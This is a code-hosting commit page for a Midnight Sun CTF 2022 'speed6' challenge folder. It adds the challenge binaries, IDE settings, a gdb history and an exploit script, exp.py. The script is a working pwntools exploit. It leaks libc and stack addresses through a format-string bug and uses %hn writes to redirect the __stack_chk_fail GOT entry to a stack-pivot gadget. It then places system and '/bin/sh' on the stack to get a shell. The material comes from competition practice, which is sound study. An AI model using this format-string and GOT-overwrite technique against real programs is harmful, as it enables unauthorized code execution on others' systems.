Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
_sky123_
attachment
提交
da4c70a4
A
attachment
项目概览
_sky123_
/
attachment
通知
29
Star
3
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
DevOps
流水线
流水线任务
计划
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
A
attachment
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
DevOps
DevOps
流水线
流水线任务
计划
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
流水线任务
提交
Issue看板
前往新版Gitcode,体验更适合开发者的 AI 搜索 >>
提交
da4c70a4
编写于
8月 08, 2023
作者:
_sky123_
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
update
上级
e1b8b276
变更
13
隐藏空白更改
内联
并排
Showing
13 changed file
with
206 addition
and
0 deletion
+206
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281.tar.gz
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281.tar.gz
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history
+124
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore
...wn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore
+3
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/inspectionProfiles/profiles_settings.xml
...peed6_f281/.idea/inspectionProfiles/profiles_settings.xml
+6
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/misc.xml
..._pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/misc.xml
+4
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/modules.xml
...n/2022MidnightSunCTF_speed6/speed6_f281/.idea/modules.xml
+8
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/speed6_f281.iml
...22MidnightSunCTF_speed6/speed6_f281/.idea/speed6_f281.iml
+8
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/vcs.xml
...c_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/vcs.xml
+6
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/exp.py
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/exp.py
+47
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/ld-2.31.so
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/ld-2.31.so
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/libc.so.6
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/libc.so.6
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6
+0
-0
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6_patch
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6_patch
+0
-0
未找到文件。
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281.tar.gz
0 → 100755
浏览文件 @
da4c70a4
文件已添加
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history
0 → 100644
浏览文件 @
da4c70a4
c
c
c
vmmap
checksec
c
stack 50
x/20gx 0xfff17c64-0x94
ni
c
stack 60
p/x 37
ni
stack 60
c
ni
stack 60
c
c
stack 60
c
c
c
c
stack 60
c
c
c
stack 60
c
c
c
c
c
stack 60
c
stack 70
c
c
stack 70
c
c
p/x 85
q
c
stack 30
q
c
stack 100
ni
stack 100
p/x 37
stack 100
p/x 85
p/x 0xffa7fc24-0x94
c
ni
c
q
c
c
q
c
canary
canary
stack 30
tls
q
c
c
ni
telescope 0xff983b18-0xc
q
q
c
got
x/gx 0804c01c
telescope 0x0804c01c
q
c
got
telescope 0x0804c01c
q
c
c
ni
stack 70
p/x 85
stack 70
q
c
stack 30
telescope 0xffdb6bd0 50
p/x 0xffdb6bdc+0xc-0xffdb6bd0
p/x 0xffdb6bdc+0x3c-0xffdb6bd0
q
c
k
x/gx 0xffac0890+0x48
p/x 0xfface370-0xc
q
c
q
c
got
telescope 0x0804c01c
q
c
c
stack 30
ni
stack 30
p/x 0xffdf49e8-0xffdf49a0
p/x 0x48*4
p/x 0x48-0x3c
p/x (0x48-0x3c)+0x100
p/x (0x48-0x3c)+0x100
p/x 0x100-0xc
p/x0x10c/4
q
c
ni
c
q
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore
0 → 100644
浏览文件 @
da4c70a4
# 默认忽略的文件
/shelf/
/workspace.xml
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/inspectionProfiles/profiles_settings.xml
0 → 100644
浏览文件 @
da4c70a4
<component
name=
"InspectionProjectProfileManager"
>
<settings>
<option
name=
"USE_PROJECT_PROFILE"
value=
"false"
/>
<version
value=
"1.0"
/>
</settings>
</component>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/misc.xml
0 → 100644
浏览文件 @
da4c70a4
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectRootManager"
version=
"2"
project-jdk-name=
"Python 2.7"
project-jdk-type=
"Python SDK"
/>
</project>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/modules.xml
0 → 100644
浏览文件 @
da4c70a4
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectModuleManager"
>
<modules>
<module
fileurl=
"file://$PROJECT_DIR$/.idea/speed6_f281.iml"
filepath=
"$PROJECT_DIR$/.idea/speed6_f281.iml"
/>
</modules>
</component>
</project>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/speed6_f281.iml
0 → 100644
浏览文件 @
da4c70a4
<?xml version="1.0" encoding="UTF-8"?>
<module
type=
"PYTHON_MODULE"
version=
"4"
>
<component
name=
"NewModuleRootManager"
>
<content
url=
"file://$MODULE_DIR$"
/>
<orderEntry
type=
"jdk"
jdkName=
"Python 2.7"
jdkType=
"Python SDK"
/>
<orderEntry
type=
"sourceFolder"
forTests=
"false"
/>
</component>
</module>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/vcs.xml
0 → 100644
浏览文件 @
da4c70a4
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"VcsDirectoryMappings"
>
<mapping
directory=
"$PROJECT_DIR$/../../.."
vcs=
"Git"
/>
</component>
</project>
\ No newline at end of file
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/exp.py
0 → 100644
浏览文件 @
da4c70a4
from
pwn
import
*
elf
=
ELF
(
"./speed6"
)
libc
=
ELF
(
"./libc.so.6"
)
context
(
arch
=
elf
.
arch
,
os
=
elf
.
os
)
# context.log_level = 'debug'
p
=
process
([
elf
.
path
])
n16
=
lambda
x
:
(
x
+
0x10000
)
&
0xFFFF
p
.
sendlineafter
(
"f5b: "
,
"%2$p||%37$p"
)
p
.
recvuntil
(
"0x"
)
libc
.
address
=
int
(
p
.
recvuntil
(
"||"
,
drop
=
True
),
16
)
-
libc
.
sym
[
'_IO_2_1_stdin_'
]
log
.
success
(
"libc base: "
+
hex
(
libc
.
address
))
stack_addr
=
int
(
p
.
recvuntil
(
"
\n
"
,
drop
=
True
),
16
)
-
0x55
*
4
log
.
success
(
"stack: "
+
hex
(
stack_addr
))
def
arbitrary_offset_write
(
offset
,
value
):
assert
(
stack_addr
&
0xFFFF
)
+
offset
<
(
1
<<
16
)
and
value
<
(
1
<<
16
)
p
.
sendlineafter
(
'f5b: '
,
'%{}c%37$hn'
.
format
((
stack_addr
+
offset
)
&
0xFFFF
))
p
.
sendlineafter
(
'f5b: '
,
'%{}c%85$hn'
.
format
(
value
))
def
arbitrary_address_write
(
address
,
value
):
assert
address
<
(
1
<<
32
)
and
value
<
(
1
<<
16
)
arbitrary_offset_write
(
0x30
*
4
,
address
&
0xFFFF
)
arbitrary_offset_write
((
0x30
*
4
+
2
)
&
0xFFFF
,
address
>>
16
)
p
.
sendlineafter
(
'f5b: '
,
'%{}c%48$hn'
.
format
(
value
&
0xFFFF
))
add_esp_ret
=
libc
.
search
(
asm
(
'add esp, 0x100; sub eax, edx; ret;'
),
executable
=
True
).
next
()
arbitrary_address_write
(
elf
.
got
[
'__stack_chk_fail'
],
add_esp_ret
&
0xFFFF
)
arbitrary_address_write
(
elf
.
got
[
'__stack_chk_fail'
]
+
2
,
add_esp_ret
>>
16
)
system_addr
=
libc
.
sym
[
'system'
]
bin_sh_addr
=
libc
.
search
(
'/bin/sh'
).
next
()
arbitrary_offset_write
(
0x43
*
4
,
system_addr
&
0xFFFF
)
arbitrary_offset_write
(
0x43
*
4
+
2
,
system_addr
>>
16
)
arbitrary_offset_write
(
0x45
*
4
,
bin_sh_addr
&
0xFFFF
)
arbitrary_offset_write
(
0x45
*
4
+
2
,
bin_sh_addr
>>
16
)
# gdb.attach(p, 'b *{}'.format(hex(add_esp_ret)))
# pause()
arbitrary_offset_write
(
0x1c
,
0x1
)
# change canary to call the __stack_chk_fail
p
.
interactive
()
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/ld-2.31.so
0 → 100755
浏览文件 @
da4c70a4
文件已添加
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/libc.so.6
0 → 100755
浏览文件 @
da4c70a4
文件已添加
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6
0 → 100755
浏览文件 @
da4c70a4
文件已添加
glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/speed6_patch
0 → 100755
浏览文件 @
da4c70a4
文件已添加
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录